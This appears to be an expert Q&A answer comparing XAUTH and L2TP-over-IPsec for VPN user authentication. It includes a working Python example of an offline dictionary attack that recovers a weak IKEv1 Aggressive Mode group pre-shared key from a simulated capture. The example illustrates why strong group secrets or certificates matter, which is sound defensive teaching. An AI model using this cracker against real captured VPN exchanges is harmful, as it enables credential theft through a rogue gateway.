Most IPsec VPN products use one of two common alternatives to support user authentication: Extended Authentication (XAUTH) or the Layer Two Tunneling Protocol (L2TP) over IPsec.
- L2TP over IPsec is implemented by the native Microsoft VPN client in Windows 2000, XP, and 2003. Add-on L2TP over IPsec clients are also available for most other operating systems. You'll also need a VPN gateway that supports L2TP over IPsec. In this approach, an IPsec connection is first established in transport mode, authenticating the two machines (with a pre-shared key or certificate) rather than the user. User authentication then takes place inside L2TP (UDP/1701), which carries PPP and its user-authentication exchange; because the L2TP traffic is sent over the IPsec transport, the user credentials travel encrypted.
- XAUTH is implemented by most non-Microsoft VPN clients and VPN remote access concentrators. XAUTH inserts a non-standard exchange into the IKE protocol, after IKE Phase 1 peer authentication but before the Phase 2 exchange that establishes the IPsec tunnel. XAUTH is vulnerable when used with group passwords (group pre-shared keys) that are easily guessed: an attacker who recovers the group secret can pose as the gateway and collect users' XAUTH credentials. To learn more, read the Cisco advisory on this issue or the article by John Pliam. However, when XAUTH is combined with a strong group secret or a certificate and two-factor user authentication, risk is much lower.
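To make the "easily guessed group password" caveat concrete, here is an added example (not code from the original answer or from any vendor) of the offline dictionary attack that the cited Cisco advisory and Pliam article describe. It assumes the IKEv1 Aggressive Mode pre-shared-key formulas from RFC 2409 with HMAC-SHA1 as the negotiated prf; the "captured" exchange, the wordlist and the gateway identity 192.0.2.1 are all constructed in-process, and the Diffie-Hellman values, cookies and nonces are random placeholders since only their bytes enter the hash.

```python
# Added example: offline dictionary attack on an IKEv1 Aggressive Mode group
# pre-shared key. Not from the original page. Assumes RFC 2409 section 5.4
# pre-shared-key formulas with HMAC-SHA1 as prf; the capture is constructed.
import hashlib
import hmac
import os
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass(frozen=True)
class AggressiveModeCapture:
    """Values a sniffer (or any client that merely starts an exchange with the
    gateway) sees in the clear in IKEv1 Aggressive Mode with PSK authentication."""
    g_xi: bytes     # initiator Diffie-Hellman public value
    g_xr: bytes     # responder Diffie-Hellman public value
    cky_i: bytes    # initiator cookie (8 bytes)
    cky_r: bytes    # responder cookie (8 bytes)
    sa_i_b: bytes   # body of the initiator's SA payload (opaque to the attack)
    id_ir_b: bytes  # body of the responder's ID payload
    ni_b: bytes     # initiator nonce
    nr_b: bytes     # responder nonce
    hash_r: bytes   # HASH_R, sent unencrypted by the responder in Aggressive Mode


def ike_hash_r(psk: bytes, c: AggressiveModeCapture) -> bytes:
    """HASH_R per RFC 2409 (pre-shared key authentication):
    SKEYID = prf(psk, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)"""
    skeyid = hmac.new(psk, c.ni_b + c.nr_b, hashlib.sha1).digest()
    msg = c.g_xr + c.g_xi + c.cky_r + c.cky_i + c.sa_i_b + c.id_ir_b
    return hmac.new(skeyid, msg, hashlib.sha1).digest()


def simulate_capture(psk: bytes) -> AggressiveModeCapture:
    """Stand-in for sniffing a gateway whose group secret is `psk`.
    All fields except hash_r are random placeholders (constructed here)."""
    fields = dict(
        g_xi=os.urandom(128), g_xr=os.urandom(128),
        cky_i=os.urandom(8), cky_r=os.urandom(8),
        sa_i_b=os.urandom(44),
        # ID_IPV4_ADDR (type 1), protocol 0, port 0, address 192.0.2.1 (constructed)
        id_ir_b=bytes([1, 0, 0, 0]) + bytes([192, 0, 2, 1]),
        ni_b=os.urandom(20), nr_b=os.urandom(20),
    )
    unsigned = AggressiveModeCapture(hash_r=b"", **fields)
    return AggressiveModeCapture(hash_r=ike_hash_r(psk, unsigned), **fields)


def crack_group_psk(c: AggressiveModeCapture, wordlist: Iterable[str]) -> Optional[str]:
    """Try each candidate as the group secret; a HASH_R match reveals it.
    Nothing further is sent to the gateway: the work is entirely offline."""
    for candidate in wordlist:
        if hmac.compare_digest(ike_hash_r(candidate.encode(), c), c.hash_r):
            return candidate
    return None


# Constructed wordlist for the demonstration.
WORDLIST = ["password", "vpn", "cisco", "cisco123", "Summer2004", "letmein"]


def demo() -> tuple:
    """A guessable group password falls to the wordlist; a random 32-byte
    secret (the 'strong group secret' the answer recommends) does not."""
    weak = crack_group_psk(simulate_capture(b"cisco123"), WORDLIST)
    strong = crack_group_psk(simulate_capture(os.urandom(32)), WORDLIST)
    return weak, strong


if __name__ == "__main__":
    print(demo())  # ('cisco123', None)
```

The point of the example is that every input to HASH_R except the group secret is exposed by the protocol itself, so guessing speed is limited only by the attacker's hardware, never by the gateway. Once the group secret is known, a rogue gateway can complete Phase 1 with a real client and receive its XAUTH username and password, which is why a long random group secret, or certificates in place of the group secret, matters even when the user credential itself is a one-time token.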
The IETF is now working on a new version of IKE (IKEv2) that will provide native support for a variety of user authentication methods, including generic token cards. To learn more, see the latest IKEv2 Internet Draft.
Related Q&A from Lisa Phifer